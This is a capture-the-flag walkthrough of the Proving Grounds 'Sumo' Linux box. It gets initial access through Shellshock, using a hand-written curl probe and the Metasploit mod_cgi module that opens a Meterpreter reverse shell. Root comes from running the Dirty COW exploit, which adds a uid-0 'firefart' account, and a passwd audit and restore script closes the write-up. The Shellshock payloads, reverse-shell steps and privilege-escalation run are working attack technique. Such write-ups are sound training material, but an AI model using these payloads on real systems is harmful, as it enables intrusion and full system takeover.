
Proving Grounds: Sumo Walkthrough


Machine Stats

Ubuntu Linux 12.04



I started by running my standard nmap scan:

└─$ nmap -A -T4 -p- 
Starting Nmap 7.92 ( ) at 2022-03-22 22:10 EDT
Nmap scan report for
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds

Here we can see an open web server. I ran a gobuster directory enumeration scan against it, but it didn't return anything too interesting on the surface.

└─$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/index                (Status: 200) [Size: 177]
/server-status        (Status: 403) [Size: 295]

I like to follow up with a Nikto scan against every web server I find, so I gave this a shot. (Extraneous output has been trimmed below.)

└─$ nikto -h        
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2022-03-22 22:13:57 (GMT-4)
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (
+ OSVDB-112004: /cgi-bin/ Site appears vulnerable to the 'shellshock' vulnerability (
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2022-03-22 22:18:58 (GMT-4) (301 seconds)
+ 1 host(s) tested
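Nikto's "appears vulnerable" is a heuristic, so before spending a Metasploit session on it I like to confirm Shellshock by hand with a canary that can only appear in the response if bash on the server actually executed the injected command. The script below is an added example for this walkthrough, not part of the original post or of any tool used in it. It assumes the CGI path Nikto reported (/cgi-bin/test) and takes the target base URL as its first argument (a hypothetical placeholder); the response body it checks offline is constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): confirm a Nikto Shellshock
# finding by hand with a unique canary before reaching for Metasploit.
# Assumptions: the CGI path is the one Nikto reported (/cgi-bin/test) and the
# target base URL is passed as $1 (hypothetical, e.g. http://10.0.0.5).

# Build the malicious header value. The two "echo" calls print the blank line
# that terminates the CGI response headers; without it Apache answers 500 and
# the command output never reaches us, so a vulnerable host looks clean.
shellshock_header() {
    canary="$1"
    cmd="$2"
    printf '() { :; }; echo; echo; /bin/bash -c "echo %s; %s"' "$canary" "$cmd"
}

# Exit 0 when the saved response body contains the canary, which can only
# happen if bash on the server executed the injected command.
response_has_canary() {
    grep -q -- "$2" "$1"
}

# Send the probe in User-Agent and Referer (both are exported into the CGI
# environment by Apache) and report whether the canary came back.
shellshock_probe() {
    url="$1"
    canary="ss-$(date +%s)-$$"
    hdr="$(shellshock_header "$canary" "id")"
    body="$(mktemp)"
    curl -s -m 10 -o "$body" -H "User-Agent: $hdr" -H "Referer: $hdr" "$url/cgi-bin/test"
    if response_has_canary "$body" "$canary"; then
        echo "[+] $url/cgi-bin/test runs injected commands:"
        grep -A1 -- "$canary" "$body"
    else
        echo "[-] no canary in the response from $url/cgi-bin/test"
    fi
    rm -f "$body"
}

if [ "$#" -ge 1 ]; then
    shellshock_probe "$1"
else
    # Offline demonstration against a constructed response body.
    sample="$(mktemp)"
    printf 'ABC123\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n' > "$sample"
    echo "header: $(shellshock_header ABC123 id)"
    response_has_canary "$sample" ABC123 && echo "canary found in constructed response"
    rm -f "$sample"
fi
```

With a real target, a hit prints the canary followed by the output of `id`, which also tells you which account the CGI runs as (www-data here) before you pick a payload.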

User Account

Alright, I was feeling lazy, so I used Metasploit for this. I wanted the exploit with the best reliability rating and chose this one, rated "excellent":


msf6 > search shellshock

1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

msf6 > use 1

With the module selected, I set the following options:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => tun0
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.
TARGETURI => /cgi-bin/
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost
rhost =>

I crossed my fingers and ran the dang thing.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to
[*] Meterpreter session 1 opened ( -> ) at 2022-03-22 22:23:39 -0400

meterpreter > getuid
Server username: www-data

I wanted to get some basic information about the system, upload my enumeration script (linpeas), and grab the low-privilege user flag.

meterpreter > sysinfo
Computer     :
OS           : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

meterpreter > upload /var/www/html/ /tmp
[*] uploading  : /var/www/html/ -> /tmp
[*] uploaded   : /var/www/html/ -> /tmp/

meterpreter > download ./local.txt
[*] Downloading: ./local.txt -> /home/me/local.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): ./local.txt -> /home/me/local.txt
[*] download   : ./local.txt -> /home/me/local.txt

└─$ cat local.txt              

Privilege Escalation & Root Flag

Looking through the linpeas output, I noticed immediately that the machine was flagged as vulnerable to the infamous Dirty COW (CVE-2016-5195) privilege escalation route. I was also somewhat surprised not to find a working Metasploit module for it. There was a litany of other potential vulnerabilities, but I already knew this one by name, so I figured it was probably the way to go here.

╔══════════╣ Executing Linux Exploit Suggester

[+] [CVE-2016-5195] dirtycow 2

   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL:
   Comments: For RHEL/CentOS see exact vulnerable versions here:

I confirmed the victim had gcc installed, so I could compile the exploit's C source on the box itself, then backgrounded my shell to drop back to meterpreter and upload it.

meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40839.c /tmp
[*] uploading  : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp
[*] uploaded   : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp/40839.c

I then went back to the system shell in the session I had just backgrounded and compiled the exploit as described on its Exploit-DB page:

gcc -pthread 40839.c -o dirty -lcrypt


I ran the resulting binary (./dirty), set the password to "test" when prompted, and waited for the exploit to finish.

Please enter the new password: test

/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f01a3ef0000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Browsing the exploit code, I could see that the user it creates is named firefart. I opened a new terminal and SSH'ed to the victim as this user with the password I had just set (test).

└─$ ssh firefart@                  
firefart@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

firefart@ubuntu:~# id
uid=0(firefart) gid=0(root) groups=0(root)

firefart@ubuntu:~# cat /root/proof.txt

I submitted this flag and it was accepted.
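The exploit's own "DON'T FORGET TO RESTORE" warning is worth taking seriously: it leaves a second uid-0 account in /etc/passwd, which is exactly what a defender (or the next person on a shared lab box) will look for. The script below is an added example, not part of the original walkthrough or of 40839.c; it lists any non-root uid-0 account in a passwd file and copies the exploit's backup back only after checking that the backup itself is sane. File paths are parameters so it can be exercised on constructed copies; the hash in the sample line is made up, and restoring the real /etc/passwd needs root.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): audit a passwd file for
# the extra uid-0 account that 40839.c writes, and put the original back from
# the backup the exploit leaves in /tmp/passwd.bak. Paths are parameters so the
# functions can be exercised on constructed copies; real use needs root.

# Print "name:uid" for every account with uid 0 that is not root.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 ":" $3 }' "$1"
}

# Copy the backup over the target only if the backup is sane: it must still
# contain root with uid 0 and must not itself carry a rogue uid-0 entry.
restore_passwd() {
    backup="$1"
    target="${2:-/etc/passwd}"
    if ! awk -F: '$1 == "root" && $3 == 0 { ok = 1 } END { exit !ok }' "$backup"; then
        echo "refusing to restore: no root:0 entry in $backup" >&2
        return 1
    fi
    if [ -n "$(extra_uid0_accounts "$backup")" ]; then
        echo "refusing to restore: $backup itself has a non-root uid-0 account" >&2
        return 1
    fi
    # cp rather than the mv the exploit suggests, so the backup survives as evidence.
    cp -p "$backup" "$target"
}

if [ "$#" -ge 1 ]; then
    restore_passwd "$@"
else
    # Offline demonstration on constructed copies (the hash value is made up).
    orig="$(mktemp)"
    cur="$(mktemp)"
    printf 'root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/bin/sh\n' > "$orig"
    cp "$orig" "$cur"
    echo 'firefart:fiHASHhere:0:0:pwned:/root:/bin/bash' >> "$cur"
    echo "before restore: $(extra_uid0_accounts "$cur")"
    restore_passwd "$orig" "$cur"
    after="$(extra_uid0_accounts "$cur")"
    echo "after restore:  ${after:-none}"
    rm -f "$orig" "$cur"
fi
```

On the box itself this is `extra_uid0_accounts /etc/passwd` to see the firefart entry, then `restore_passwd /tmp/passwd.bak` as root to undo it; the same one-line awk check is a cheap host audit for any Linux system, Dirty COW or not.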
